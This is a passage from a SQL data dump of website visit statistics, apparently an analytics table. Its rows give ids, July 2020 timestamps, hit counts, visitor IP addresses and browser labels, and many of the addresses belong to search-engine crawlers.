1,0,0,'31.13.127.2','other'),(523804,1595074267,3,3,0,0,'66.249.70.72','chrome'),(523805,1595074287,1,1,0,0,'66.249.64.36','chrome'),(523806,1595074938,1,1,0,0,'178.154.200.92','other'),(523807,1595074972,1,1,0,0,'178.154.200.196','other'),(523808,1595075425,1,1,0,0,'66.249.64.38','chrome'),(523809,1595075449,2,2,0,0,'91.209.11.236','other'),(523810,1595075554,1,1,0,0,'66.249.64.36','chrome'),(523811,1595075643,1,1,0,0,'66.249.70.72','chrome'),(523812,1595076610,1,1,0,0,'66.249.70.69','chrome'),(523813,1595076690,2,2,0,0,'91.209.11.236','other'),(523814,1595076752,1,1,0,0,'157.55.39.186','other'),(523815,1595077080,2,2,0,0,'8.29.198.25','other'),(523816,1595077123,1,1,0,0,'66.249.64.33','chrome'),(523817,1595077569,3,3,0,0,'66.249.70.72','chrome'),(523818,1595078626,1,1,0,0,'157.55.39.186','other'),(523820,1595079210,1,1,0,0,'66.249.70.69','chrome'),(523821,1595079214,1,1,0,0,'66.249.64.38','chrome'),(523822,1595079438,1,1,0,0,'66.249.64.36','chrome'),(523823,1595079710,1,1,0,0,'92.38.136.69','chrome'),(523824,1595080126,1,1,0,0,'66.249.70.72','chrome'),(523825,1595080408,1,1,0,0,'183.136.225.46','firefox'),(523826,1595081210,1,1,0,0,'66.249.70.69','chrome'),(523827,1595081346,1,1,0,0,'157.55.39.186','other'),(523828,1595081619,1,1,0,0,'45.90.58.33','msie'),(523829,1595081672,1,1,0,0,'17.58.99.7','other'),(523830,1595082057,8,8,0,0,'94.130.9.183','other'),(523831,1595082270,1,1,0,0,'66.249.64.33','chrome'),(523832,1595082485,8,8,0,0,'185.11.82.228','other'),(523833,1595082811,2,2,0,0,'157.55.39.85','other'),(523834,1595082850,1,1,0,0,'66.249.70.72','chrome'),(523835,1595082962,7,7,0,0,'94.130.9.183','other'),(523836,1595083300,1,1,0,0,'66.249.64.33','chrome'),(523837,1595083888,4,4,0,0,'94.130.9.183','other'),(523838,1595084442,1,1,0,0,'66.249.70.70','chrome'),(523839,1595084763,1,1,0,0,'157.55.39.85','other'),(523840,1595085747,3,3,0,0,'66.249.70.69','chrome'),(523841,1595086094,1,1,0,0,'66.249.70.70','chrome'),(523842,1595086221,1,1,0,0,'66.249.70.72','chrome'),(523843,1595087309,1,1,0,0,'66.249.70.72','chrome'),(523844,1595087390,1,1,0,0,'178.154.200.222','other'),(523845,1595087913,1,1,0,0,'8.29.198.27','other'),(523846,1595087933,1,1,0,0,'8.29.198.26','other'),(523847,1595088066,1,1,0,0,'131.220.6.156','chrome'),(523848,1595088292,2,2,0,0,'66.249.70.69','chrome'),(523849,1595090009,2,2,0,0,'66.249.70.69','chrome'),(523850,1595090068,1,1,0,0,'157.55.39.85','other'),(523851,1595090116,1,1,0,0,'181.47.24.178','chrome'),(523852,1595090975,1,1,0,0,'178.154.200.222','other'),(523853,1595092322,1,1,0,0,'17.58.99.7','other'),(523854,1595092563,1,1,0,0,'66.249.70.70','chrome'),(523855,1595092962,1,1,0,0,'66.249.64.38','chrome'),(523856,1595093335,1,1,0,0,'66.249.70.69','chrome'),(523857,1595094808,8,8,0,0,'185.11.82.228','other'),(523858,1595095109,1,1,0,0,'66.249.64.36','chrome'),(523859,1595095374,1,1,0,0,'66.249.70.69','chrome'),(523860,1595096561,1,1,0,0,'5.45.207.76','other'),(523861,1595097335,1,1,0,0,'207.46.13.76','other'),(523862,1595098199,1,1,0,0,'66.249.70.70','chrome'),(523863,1595098444,1,0,1,0,'66.249.70.69',''),(523864,1595098468,1,1,0,0,'17.58.99.7','other'),(523865,1595098751,1,1,0,0,'8.29.198.27','other'),(523866,1595098768,1,1,0,0,'8.29.198.26','other'),(523867,1595098808,1,1,0,0,'207.46.13.76','other'),(523868,1595098984,1,1,0,0,'66.249.70.69','chrome'),(523869,1595100234,1,1,0,0,'66.249.70.72','chrome'),(523870,1595101594,1,1,0,0,'207.46.13.76','other'),(523871,1595102275,1,1,0,0,'66.249.64.33','chrome'),(523872,1595102430,1,1,0,0,'91.196.178.176','chrome'),(523873,1595102671,2,2,0,0,'178.154.200.222','other'),(523874,1595103612,1,1,0,0,'66.249.70.72','chrome'),(523875,1595106242,1,1,0,0,'66.249.70.72','chrome'),(523876,1595106409,1,1,0,0,'207.46.13.76','other'),(523877,1595106561,1,1,0,0,'66.249.70.69','chrome'),(523878,1595106736,1,1,0,0,'88.155.134.56','other'),(523879,1595107158,1,1,0,0,'157.55.39.186','other'),(523880,1595107594,1,1,0,0,'66.249.70.70','chrome'),(523881,1595107778,1,1,0,0,'178.154.200.222','other'),(523882,1595107891,1,1,0,0,'157.55.39.85','other'),(523883,1595108189,3,3,0,0,'159.69.150.77','other'),(523884,1595108424,1,1,0,0,'17.58.99.7','other'),(523885,1595108593,2,2,0,0,'66.249.70.72','chrome'),(523886,1595109581,2,2,0,0,'8.29.198.27','other'),(523887,1595110635,8,8,0,0,'185.11.82.228','other'),(523888,1595111105,3,3,0,0,'159.69.150.77','other'),(523889,1595111439,2,2,0,0,'178.154.200.222','other'),(523890,1595111935,1,1,0,0,'66.249.70.69','chrome'),(523891,1595112228,1,1,0,0,'178.154.200.222','chrome'),(523892,1595113061,1,1,0,0,'207.46.13.76','other'),(523893,1595113757,1,1,0,0,'157.55.39.106','other'),(523894,1595114151,1,1,0,0,'178.154.200.222','other'),(523895,1595115164,2,2,0,0,'207.46.13.146','other'),(523896,1595116420,1,1,0,0,'66.249.64.38','chrome'),(523897,1595116508,1,1,0,0,'62.205.134.182','other'),(523898,1595116915,1,1,0,0,'3.16.111.81','chrome'),(523899,1595117355,1,1,0,0,'157.55.39.187','other'),(523900,1595119615,1,1,0,0,'94.181.80.116','chrome'),(523901,1595120421,1,1,0,0,'8.29.198.25','other'),(523902,1595120440,1,1,0,0,'8.29.198.27','other'),(523903,1595120495,1,1,0,0,'178.154.200.41','other'),(523904,1595120496,1,1,0,0,'178.154.200.191','other'),(523905,1595121437,1,1,0,0,'54.190.177.167','chrome'),(523906,1595121463,1,1,0,0,'66.249.70.72','chrome'),(523907,1595122205,1,1,0,0,'157.55.39.187','other'),(523908,1595122284,1,1,0,0,'178.154.200.92','other'),(523909,1595122555,1,1,0,0,'157.55.39.186','other'),(523910,1595122861,1,1,0,0,'207.46.13.76','other'),(523911,1595123119,1,1,0,0,'207.46.13.146','other'),(523912,1595123141,1,1,0,0,'66.249.70.70','chrome'),(523913,1595123485,1,1,0,0,'157.55.39.205','other'),(523914,1595124214,1,1,0,0,'31.173.87.244','chrome'),(523915,1595126084,1,1,0,0,'207.46.13.146','other'),(523916,1595126383,2,2,0,0,'66.249.70.72','chrome'),(523917,1595126969,8,8,0,0,'185.11.82.228','other'),(523918,1595128269,1,1,0,0,'207.46.13.146','other'),(523919,1595128737,1,1,0,0,'199.47.87.141','other'),(523920,1595130476,1,1,0,0,'157.55.39.187','other'),(523921,1595131212,1,1,0,0,'157.55.39.186','other'),(523922,1595131253,2,2,0,0,'8.29.198.27','other'),(523923,1595131390,1,1,0,0,'185.191.63.197','chrome'),(523924,1595132744,1,1,0,0,'207.46.13.146','other'),(523925,1595133098,2,2,0,0,'157.55.39.187','other'),(523926,1595133198,1,1,0,0,'131.220.6.152','chrome'),(523927,1595133588,1,1,0,0,'66.249.64.36','chrome'),(523928,1595134430,1,1,0,0,'62.205.134.182','other'),(523929,1595135076,2,2,0,0,'66.249.70.72','chrome'),(523930,1595135543,1,1,0,0,'66.249.70.69','chrome'),(523931,1595135761,1,1,0,0,'66.249.64.38','chrome'),(523932,1595135920,1,1,0,0,'17.58.99.7','other'),(523933,1595136465,1,1,0,0,'66.249.70.70','chrome'),(523934,1595136485,1,1,0,0,'157.55.39.186','other'),(523935,1595136900,1,1,0,0,'66.249.64.33','chrome'),(523936,1595137316,1,1,0,0,'66.249.70.72','chrome'),(523937,1595137436,1,1,0,0,'157.55.39.85','other'),(523938,1595138244,2,2,0,0,'157.55.39.187','other'),(523939,1595140285,1,1,0,0,'66.249.64.38','chrome'),(523940,1595140292,1,1,0,0,'66.249.70.70','chrome'),(523941,1595140789,1,1,0,0,'157.55.39.85','other'),(523942,1595141305,1,1,0,0,'66.249.70.69','chrome'),(523943,1595141945,1,1,0,0,'66.249.70.70','chrome'),(523944,1595142092,1,1,0,0,'8.29.198.25','other'),(523945,1595142116,1,1,0,0,'8.29.198.27','other'),(523946,1595142385,1,1,0,0,'207.46.13.76','other'),(523947,1595142509,1,1,0,0,'157.55.39.85','other'),(523948,1595142822,2,2,0,0,'157.55.39.187','other'),(523949,1595143466,2,2,0,0,'157.55.39.85','other'),(523950,1595143786,2,2,0,0,'207.46.13.76','other'),(523951,1595145955,8,8,0,0,'185.11.82.228','other'),(523952,1595146818,1,1,0,0,'66.249.70.70','chrome'),(523953,1595147061,1,1,0,0,'66.249.70.69','chrome'),(523954,1595147933,1,1,0,0,'157.55.39.186','other'),(523955,1595149418,1,1,0,0,'17.58.99.7','other'),(523956,1595149571,1,1,0,0,'157.55.39.187','other'),(523957,1595150031,1,1,0,0,'66.249.70.69','chrome'),(523958,1595150626,1,1,0,0,'157.55.39.186','other'),(523959,1595151920,1,1,0,0,'66.249.70.72','chrome'),(523960,1595152079,1,1,0,0,'66.249.64.36','chrome'),(523961,1595152503,3,3,0,0,'198.46.81.27','chrome'),(523962,1595152919,2,2,0,0,'8.29.198.25','other'),(523963,1595153493,1,1,0,0,'178.154.200.222','other'),(523964,1595153926,2,2,0,0,'151.11.49.88','chrome'),(523965,1595154105,1,1,0,0,'66.249.64.38','chrome'),(523966,1595154561,1,1,0,0,'157.55.39.187','other'),(523967,1595155049,1,0,1,0,'66.249.70.70',''),(523968,1595155051,1,1,0,0,'66.249.70.70','chrome'),(523969,1595155182,1,0,1,0,'66.249.70.72',''),(523970,1595155189,1,1,0,0,'66.249.70.69','chrome'),(523971,1595155361,1,1,0,0,'51.68.11.227','chrome'),(523972,1595155489,1,1,0,0,'94.130.119.141','chrome'),(523973,1595155854,1,1,0,0,'66.249.70.72','chrome'),(523974,1595156033,1,1,0,0,'66.249.70.70','chrome'),(523975,1595156075,1,0,1,0,'66.249.64.38',''),(523976,1595156635,1,1,0,0,'178.154.200.222','other'),(523977,1595156723,1,1,0,0,'207.46.13.76','other'),(523978,1595157061,1,1,0,0,'174.136.12.84','chrome'),(523979,1595157180,2,2,0,0,'191.252.51.234','chrome'),(523980,1595157265,8,8,0,0,'185.11.82.228','other'),(523981,1595157677,1,1,0,0,'109.74.154.72','chrome'),(523982,1595157739,1,1,0,0,'66.249.70.72','chrome'),(523983,1595157848,1,1,0,0,'88.99.123.96','other'),(523984,1595158121,2,2,0,0,'66.249.70.69','chrome'),(523985,1595158358,1,1,0,0,'17.58.99.7','other'),(523986,1595158515,8,8,0,0,'185.11.82.228','other'),(523987,1595159088,1,1,0,0,'66.249.70.70','chrome'),(523988,1595159292,1,1,0,0,'66.249.70.72','chrome'),(523989,1595159707,1,1,0,0,'213.180.203.16','other'),(523990,1595159748,8,8,0,0,'185.11.82.228','other'),(523991,1595159930,3,3,0,0,'91.208.99.2','chrome'),(523992,1595159956,1,1,0,0,'157.55.39.187','other'),(523993,1595160012,1,1,0,0,'93.89.225.134','chrome'),(523994,1595160063,1,1,0,0,'68.66.224.56','chrome'),(523995,1595160318,1,1,0,0,'91.134.248.253','chrome'),(523996,1595161046,8,8,0,0,'185.11.82.228','other'),(523997,1595161434,1,1,0,0,'178.154.200.222','other'),(523998,1595162327,8,8,0,0,'185.11.82.228','other'),(523999,1595162477,1,1,0,0,'157.55.39.187','other'),(524000,1595163248,1,1,0,0,'193.239.44.212','chrome'),(524001,1595163321,1,1,0,0,'51.68.11.199','chrome'),(524002,1595163462,1,1,0,0,'37.73.77.163','chrome'),(524003,1595163652,8,8,0,0,'185.11.82.228','other'),(524004,1595163745,1,1,0,0,'8.29.198.27','other'),(524005,1595163789,1,1,0,0,'8.29.198.26','other'),(524006,1595164485,1,1,0,0,'91.196.178.167','chrome'),(524007,1595164648,2,2,0,0,'51.68.11.199','chrome'),(524008,1595164716,1,1,0,0,'148.66.146.25','chrome'),(524009,1595164973,8,8,0,0,'185.11.82.228','other'),(524010,1595166265,8,8,0,0,'185.11.82.228','other'),(524011,1595166279,1,1,0,0,'207.46.13.76','other'),(524012,1595166677,2,2,0,0,'157.55.39.187','other'),(524013,1595166821,1,1,0,0,'131.220.6.156','chrome'),(524014,1595167573,8,8,0,0,'185.11.82.228','other'),(524015,1595167648,1,1,0,0,'178.154.200.222','other'),(524016,1595168884,8,8,0,0,'185.11.82.228','other'),(524017,1595170175,8,8,0,0,'185.11.82.228','other'),(524018,1595170583,1,1,0,0,'207.46.13.76','other'),(524019,1595171384,1,1,0,0,'178.154.200.222','other'),(524020,1595171469,8,8,0,0,'185.11.82.228','other'),(524021,1595172151,1,1,0,0,'212.1.124.210','chrome'),(524022,1595172476,1,1,0,0,'66.249.64.36','chrome'),(524023,1595172746,1,1,0,0,'17.58.99.7','other'),(524024,1595172797,8,8,0,0,'185.11.82.228','other'),(524025,1595173459,1,1,0,0,'207.46.13.76','other'),(524026,1595174096,3,3,0,0,'66.249.70.69','chrome'),(524027,1595174136,8,8,0,0,'185.11.82.228','other'),(524028,1595174468,2,2,0,0,'72.52.238.73','chrome'),(524029,1595174577,1,1,0,0,'8.29.198.27','other'),(524030,1595174583,3,3,0,0,'51.68.11.195','chrome'),(524031,1595174628,1,1,0,0,'8.29.198.26','other'),(524032,1595175494,8,8,0,0,'185.11.82.228','other'),(524033,1595176513,1,1,0,0,'195.128.120.143','chrome'),(524034,1595176796,8,8,0,0,'185.11.82.228','other'),(524035,1595177623,1,1,0,0,'51.68.11.191','chrome'),(524036,1595178046,1,1,0,0,'50.28.99.130','chrome'),(524037,1595178054,1,1,0,0,'213.180.203.109','other'),(524038,1595178122,8,8,0,0,'185.11.82.228','other'),(524039,1595179380,1,1,0,0,'5.45.207.89','other'),(524040,1595179427,8,8,0,0,'185.11.82.228','other'),(524041,1595179946,3,3,0,0,'34.68.249.112','chrome'),(524042,1595179978,1,1,0,0,'34.68.249.112','other'),(524043,1595180141,2,2,0,0,'66.249.70.72','chrome'),(524044,1595180786,8,8,0,0,'185.11.82.228','other'),(524045,1595181309,1,1,0,0,'207.46.13.76','other'),(524046,1595181557,1,1,0,0,'66.249.70.72','chrome'),(524047,1595182124,8,8,0,0,'185.11.82.228','other'),(524048,1595182350,1,1,0,0,'91.196.178.21','chrome'),(524049,1595182429,12,12,0,0,'54.157.179.115','other'),(524050,1595183460,8,8,0,0,'185.11.82.228','other'),(524051,1595184137,1,1,0,0,'209.124.66.19','chrome'),(524052,1595184365,2,2,0,0,'93.188.2.5','chrome'),(524053,1595184594,2,2,0,0,'51.68.11.207','chrome'),(524054,1595184823,8,8,0,0,'185.11.82.228','other'),(524055,1595185134,1,1,0,0,'91.196.178.93','chrome'),(524056,1595185410,1,1,0,0,'8.29.198.25','other'),(524057,1595185458,1,1,0,0,'8.29.198.26','other'),(524058,1595185955,1,1,0,0,'157.55.39.187','other'),(524059,1595186212,8,8,0,0,'185.11.82.228','other'),(524060,1595186283,2,2,0,0,'51.68.11.215','chrome'),(524061,1595186633,1,1,0,0,'93.125.99.83','chrome'),(524062,1595187369,3,3,0,0,'91.208.99.2','chrome'),(524063,1595187543,8,8,0,0,'185.11.82.228','other'),(524064,1595187656,1,1,0,0,'66.249.70.69','chrome'),(524065,1595188924,8,8,0,0,'185.11.82.228','other'),(524066,1595190291,8,8,0,0,'185.11.82.228','other'),(524067,1595190673,2,2,0,0,'188.165.225.146','chrome'),(524068,1595190675,1,1,0,0,'178.154.200.222','other'),(524069,1595190785,1,1,0,0,'157.55.39.187','other'),(524070,1595191278,1,1,0,0,'5.61.250.80','chrome'),(524071,1595191592,8,8,0,0,'185.11.82.228','other'),(524072,1595191791,1,1,0,0,'157.55.39.187','other'),(524073,1595191853,2,2,0,0,'17.58.99.7','other'),(524074,1595192698,3,3,0,0,'104.197.208.244','chrome'),(524075,1595192699,1,1,0,0,'104.197.208.244','other'),(524076,1595192877,1,1,0,0,'207.46.13.76','other'),(524077,1595192970,1,1,0,0,'66.249.70.69','chrome'),(524078,1595192983,8,8,0,0,'185.11.82.228','other'),(524079,1595193125,1,1,0,0,'192.36.248.249','other'),(524080,1595194064,1,1,0,0,'157.55.39.187','other'),(524081,1595194346,2,2,0,0,'66.249.64.38','chrome'),(524082,1595194350,8,8,0,0,'185.11.82.228','other'),(524083,1595194721,1,1,0,0,'66.249.70.72','chrome'),(524084,1595194932,1,1,0,0,'66.249.70.69','chrome'),(524085,1595195015,1,1,0,0,'209.17.97.122','other'),(524086,1595195222,1,1,0,0,'66.249.70.70','chrome'),(524087,1595195679,8,8,0,0,'185.11.82.228','other'),(524088,1595196167,1,1,0,0,'207.46.13.76','other'),(524089,1595196241,1,1,0,0,'8.29.198.27','other'),(524090,1595196293,1,1,0,0,'8.29.198.25','other'),(524091,1595197024,8,8,0,0,'185.11.82.228','other'),(524092,1595197399,1,1,0,0,'77.246.156.194','chrome'),(524093,1595197475,1,1,0,0,'66.249.70.69','chrome'),(524094,1595197566,1,1,0,0,'66.249.70.72','chrome'),(524095,1595197671,1,1,0,0,'17.58.99.7','other'),(524096,1595198405,8,8,0,0,'185.11.82.228','other'),(524097,1595198611,1,1,0,0,'157.55.39.187','other'),(524098,1595199656,8,8,0,0,'185.11.82.228','other'),(524099,1595200944,1,1,0,0,'66.249.70.69','chrome'),(524100,1595200986,8,8,0,0,'185.11.82.228','other'),(524101,1595201103,1,1,0,0,'178.154.200.196','chrome'),(524102,1595201254,1,1,0,0,'66.249.70.70','chrome'),(524103,1595201659,3,3,0,0,'35.202.100.7','chrome'),(524104,1595201660,1,1,0,0,'35.202.100.7','other'),(524105,1595202285,8,8,0,0,'185.11.82.228','other'),(524106,1595202298,2,2,0,0,'91.208.99.2','chrome'),(524107,1595202381,1,1,0,0,'66.147.238.141','chrome'),(524108,1595202907,1,1,0,0,'62.205.134.182','other'),(524109,1595203610,8,8,0,0,'185.11.82.228','other'),(524110,1595203703,1,1,0,0,'178.210.68.22','chrome'),(524111,1595203910,2,2,0,0,'207.46.13.4','other'),(524112,1595204928,8,8,0,0,'185.11.82.228','other'),(524113,1595205476,1,1,0,0,'68.66.224.56','chrome'),(524114,1595206207,1,1,0,0,'51.68.11.207','chrome'),(524115,1595206213,8,8,0,0,'185.11.82.228','other'),(524116,1595207070,2,2,0,0,'8.29.198.27','other'),(524117,1595207286,1,1,0,0,'66.249.70.70','chrome'),(524118,1595207536,8,8,0,0,'185.11.82.228','other'),(524119,1595207673,1,1,0,0,'207.46.13.76','other'),(524120,1595207681,2,2,0,0,'66.249.70.72','chrome'),(524121,1595207826,1,1,0,0,'66.249.70.69','chrome'),(524122,1595208201,1,1,0,0,'66.249.64.38','chrome'),(524123,1595208503,1,1,0,0,'78.110.50.153','chrome'),(524124,1595208558,1,1,0,0,'207.46.13.4','other'),(524125,1595208798,2,2,0,0,'91.208.99.2','chrome'),(524126,1595208883,8,8,0,0,'185.11.82.228','other'),(524127,1595209424,1,1,0,0,'157.55.39.187','other'),(524128,1595210250,8,8,0,0,'185.11.82.228','other'),(524129,1595210311,2,2,0,0,'45.32.106.150','chrome'),(524130,1595210764,1,1,0,0,'157.55.39.187','other'),(524131,1595211571,8,8,0,0,'185.11.82.228','other'),(524132,1595211995,1,0,1,0,'66.249.70.69',''),(524133,1595212073,3,3,0,0,'66.249.70.70','chrome'),(524134,1595212120,1,1,0,0,'66.249.64.38','chrome'),(524135,1595212403,1,1,0,0,'66.249.70.72','chrome'),(524136,1595212473,1,1,0,0,'207.46.13.76','other'),(524137,1595212878,8,8,0,0,'185.11.82.228','other'),(524138,1595213498,1,1,0,0,'17.58.99.7','other'),(524139,1595214190,8,8,0,0,'185.11.82.228','other'),(524140,1595214996,4,4,0,0,'72.52.238.73','chrome'),(524141,1595215084,1,1,0,0,'66.249.70.72','chrome'),(524142,1595215204,2,2,0,0,'51.68.11.227','chrome'),(524143,1595215542,8,8,0,0,'185.11.82.228','other'),(524144,1595215758,2,2,0,0,'207.46.13.4','other'),(524145,1595216884,8,8,0,0,'185.11.82.228','other'),(524146,1595217430,2,2,0,0,'50.62.176.26','chrome'),(524147,1595217834,2,2,0,0,'198.46.81.27','chrome'),(524148,1595217893,1,1,0,0,'8.29.198.27','other'),(524149,1595217954,1,1,0,0,'8.29.198.26','other'),(524150,1595218209,8,8,0,0,'185.11.82.228','other'),(524151,1595218619,1,1,0,0,'66.249.70.70','chrome'),(524152,1595219154,1,1,0,0,'207.46.13.76','other'),(524153,1595219540,1,1,0,0,'131.220.6.152','chrome'),(524154,1595219544,1,1,0,0,'66.249.70.70','chrome'),(524155,1595219548,8,8,0,0,'185.11.82.228','other'),(524156,1595220034,1,1,0,0,'157.55.39.187','other'),(524157,1595220765,1,1,0,0,'62.205.134.182','other'),(524158,1595220907,1,1,0,0,'178.154.200.222','other'),(524159,1595220951,8,8,0,0,'185.11.82.228','other'),(524160,1595221020,1,1,0,0,'95.135.213.30','chrome'),(524161,1595221347,1,1,0,0,'157.55.39.187','other'),(524162,1595221945,1,1,0,0,'178.154.200.222','other'),(524163,1595222103,1,1,0,0,'66.249.70.69','chrome'),(524164,1595222176,1,1,0,0,'91.196.178.74','chrome'),(524165,1595222287,8,8,0,0,'185.11.82.228','other'),(524166,1595222404,1,1,0,0,'212.1.124.210','chrome'),(524167,1595222574,1,1,0,0,'31.13.115.3','other'),(524168,1595222576,1,1,0,0,'31.13.115.9','other'),(524169,1595222581,1,1,0,0,'31.13.115.20','other'),(524170,1595222632,1,1,0,0,'31.13.115.5','other'),(524171,1595222635,1,1,0,0,'31.13.115.7','other'),(524172,1595222848,1,1,0,0,'66.249.64.36','chrome'),(524173,1595222920,1,1,0,0,'66.249.70.72','chrome'),(524174,1595223343,1,1,0,0,'149.210.195.160','chrome'),(524175,1595223547,4,4,0,0,'66.249.70.69','chrome'),(524176,1595223567,8,8,0,0,'185.11.82.228','other'),(524177,1595224122,1,1,0,0,'91.196.178.185','other'),(524178,1595224153,1,1,0,0,'94.130.53.35','other'),(524179,1595224331,1,1,0,0,'217.182.175.162','chrome'),(524180,1595224455,1,1,0,0,'66.249.70.70','chrome'),(524181,1595224572,1,1,0,0,'66.249.70.72','chrome'),(524182,1595224883,8,8,0,0,'185.11.82.228','other'),(524183,1595225133,1,1,0,0,'40.124.35.98','chrome'),(524184,1595225422,1,1,0,0,'157.55.39.187','other'),(524185,1595225567,1,1,0,0,'195.128.17.206','other'),(524186,1595225676,2,2,0,0,'132.148.251.230','chrome'),(524187,1595225906,1,1,0,0,'212.1.124.210','chrome'),(524188,1595225968,1,1,0,0,'92.113.137.165','chrome'),(524189,1595226129,2,2,0,0,'66.249.70.69','chrome'),(524190,1595226171,8,8,0,0,'185.11.82.228','other'),(524191,1595226231,2,2,0,0,'66.249.70.72','chrome'),(524192,1595226818,1,1,0,0,'178.154.200.222','other'),(524193,1595227128,1,1,0,0,'66.249.70.69','chrome'),(524194,1595227168,1,1,0,0,'85.203.44.181','chrome'),(524195,1595227198,1,1,0,0,'174.138.51.109','chrome'),(524196,1595227444,2,2,0,0,'186.202.153.166','chrome'),(524197,1595227484,8,8,0,0,'185.11.82.228','other'),(524198,1595227762,1,1,0,0,'92.113.137.165','chrome'),(524199,1595227833,1,1,0,0,'66.220.149.25','other'),(524200,1595227859,1,1,0,0,'66.249.70.70','chrome'),(524201,1595227964,1,1,0,0,'66.249.64.36','chrome'),(524202,1595228122,1,1,0,0,'66.249.70.72','chrome'),(524203,1595228193,2,2,0,0,'207.46.13.4','other'),(524204,1595228719,1,1,0,0,'8.29.198.27','other'),(524205,1595228790,1,1,0,0,'8.29.198.26','other'),(524206,1595228845,1,1,0,0,'157.55.39.187','other'),(524207,1595228918,8,8,0,0,'185.11.82.228','other'),(524208,1595229156,2,2,0,0,'66.249.64.38','chrome'),(524209,1595229804,1,1,0,0,'207.46.13.4','other'),(524210,1595229883,1,1,0,0,'173.252.87.22','other'),(524211,1595230065,6,6,0,0,'66.249.70.69','chrome'),(524212,1595230150,2,2,0,0,'66.249.70.70','chrome'),(524213,1595230203,2,2,0,0,'66.249.70.72','chrome'),(524214,1595230298,8,8,0,0,'185.11.82.228','other'),(524215,1595230795,1,1,0,0,'31.13.127.18','other'),(524216,1595230801,1,1,0,0,'31.13.127.2','other'),(524217,1595231703,8,8,0,0,'185.11.82.228','other'),(524218,1595231707,1,1,0,0,'31.13.127.19','other'),(524219,1595231950,1,1,0,0,'47.89.29.162','chrome'),(524220,1595232332,1,1,0,0,'31.13.127.113','other'),(524221,1595233118,8,8,0,0,'185.11.82.228','other'),(524222,1595233908,1,1,0,0,'66.249.70.70','chrome'),(524223,1595233991,1,1,0,0,'103.31.232.173','chrome'),(524224,1595234039,1,1,0,0,'46.164.130.94','chrome'),(524225,1595234512,8,8,0,0,'185.11.82.228','other'),(524226,1595234598,2,2,0,0,'51.68.11.215','chrome'),(524227,1595235082,2,2,0,0,'51.68.11.195','chrome'),(524228,1595235359,1,1,0,0,'66.249.70.72','chrome'),(524229,1595235636,3,3,0,0,'66.249.70.69','chrome'),(524230,1595235899,1,1,0,0,'66.249.70.70','chrome'),(524231,1595235902,8,8,0,0,'185.11.82.228','other'),(524232,1595235914,3,3,0,0,'34.68.226.101','chrome'),(524233,1595235916,1,1,0,0,'34.68.226.101','other'),(524234,1595236288,1,1,0,0,'66.249.64.33','chrome'),(524235,1595236408,1,1,0,0,'212.1.124.210','chrome'),(524236,1595236484,1,1,0,0,'43.255.152.6','chrome'),(524237,1595236751,1,1,0,0,'66.249.64.36','chrome'),(524238,1595236886,3,3,0,0,'51.68.11.227','chrome'),(524239,1595236913,2,2,0,0,'66.249.70.72','chrome'),(524240,1595237348,2,2,0,0,'66.249.70.70','chrome'),(524241,1595237399,8,8,0,0,'185.11.82.228','other'),(524242,1595238795,8,8,0,0,'185.11.82.228','other'),(524243,1595238956,1,1,0,0,'91.196.178.74','chrome'),(524244,1595239116,1,1,0,0,'94.179.247.123','chrome'),(524245,1595239170,1,1,0,0,'34.226.244.193','chrome'),(524246,1595239267,1,1,0,0,'178.154.200.222','other'),(524247,1595239280,1,1,0,0,'13.66.139.0','other'),(524248,1595239449,2,2,0,0,'66.249.70.72','chrome'),(524249,1595239545,1,1,0,0,'8.29.198.25','other'),(524250,1595239574,2,2,0,0,'66.249.70.69','chrome'),(524251,1595239625,1,1,0,0,'8.29.198.27','other'),(524252,1595239851,1,1,0,0,'66.249.70.70','chrome'),(524253,1595240157,8,8,0,0,'185.11.82.228','other'),(524254,1595240848,1,1,0,0,'69.171.251.14','other'),(524255,1595240851,1,1,0,0,'173.252.83.117','other'),(524256,1595240872,1,1,0,0,'66.249.70.70','chrome'),(524257,1595240912,1,1,0,0,'66.249.64.36','chrome'),(524258,1595240987,1,1,0,0,'144.217.183.134','chrome'),(524259,1595241166,2,2,0,0,'66.249.70.69','chrome'),(524260,1595241238,2,2,0,0,'157.55.39.187','other'),(524261,1595241512,8,8,0,0,'185.11.82.228','other'),(524262,1595242337,1,1,0,0,'91.196.178.21','chrome'),(524263,1595242707,2,2,0,0,'66.249.70.72','chrome'),(524264,1595242829,8,8,0,0,'185.11.82.228','other'),(524265,1595242878,1,1,0,0,'66.249.64.36','chrome'),(524266,1595243055,1,1,0,0,'213.180.203.16','other'),(524267,1595243134,1,1,0,0,'109.74.154.72','chrome'),(524268,1595243139,1,1,0,0,'95.133.153.216','chrome'),(524269,1595243474,1,1,0,0,'157.55.39.166','other'),(524270,1595244200,8,8,0,0,'185.11.82.228','other'),(524271,1595244272,1,1,0,0,'91.196.177.162','chrome'),(524272,1595244458,3,3,0,0,'35.225.152.139','chrome'),(524273,1595244459,1,1,0,0,'35.225.152.139','other'),(524274,1595245572,8,8,0,0,'185.11.82.228','other'),(524275,1595245659,1,1,0,0,'91.196.178.89','chrome'),(524276,1595245773,1,1,0,0,'149.202.196.101','chrome'),(524277,1595246398,1,1,0,0,'178.92.152.1','firefox'),(524278,1595246422,2,2,0,0,'66.249.70.70','chrome'),(524279,1595246619,1,1,0,0,'66.249.70.69','chrome'),(524280,1595246939,8,8,0,0,'185.11.82.228','other'),(524281,1595247338,1,1,0,0,'46.211.74.201','chrome'),(524282,1595247764,1,1,0,0,'194.44.243.162','chrome'),(524283,1595248120,2,2,0,0,'66.249.70.69','chrome'),(524284,1595248345,8,8,0,0,'185.11.82.228','other'),(524285,1595248397,1,1,0,0,'66.249.70.70','chrome'),(524286,1595248437,1,1,0,0,'66.249.64.36','chrome'),(524287,1595248631,1,1,0,0,'94.179.147.98','chrome'),(524288,1595248779,1,1,0,0,'66.249.70.72','chrome'),(524289,1595249018,2,2,0,0,'188.165.225.146','chrome'),(524290,1595249741,8,8,0,0,'185.11.82.228','other'),(524291,1595250082,1,1,0,0,'157.55.39.166','other'),(524292,1595250177,1,1,0,0,'77.75.150.134','chrome'),(524293,1595250375,2,2,0,0,'8.29.198.25','other'),(524294,1595250616,1,1,0,0,'131.220.6.156','chrome'),(524295,1595251255,8,8,0,0,'185.11.82.228','other'),(524296,1595251393,3,3,0,0,'35.202.247.44','chrome'),(524297,1595251395,1,1,0,0,'35.202.247.44','other'),(524298,1595251980,1,1,0,0,'66.249.64.38','chrome'),(524299,1595252026,1,1,0,0,'66.249.70.69','chrome'),(524300,1595252303,1,1,0,0,'66.249.70.70','chrome'),(524301,1595252324,1,1,0,0,'142.44.166.135','other'),(524302,1595252427,1,1,0,0,'66.249.70.72','chrome'),(524303,1595252438,2,2,0,0,'54.200.80.137','chrome'),(524304,1595252878,8,8,0,0,'185.11.82.228','other'),(524305,1595253197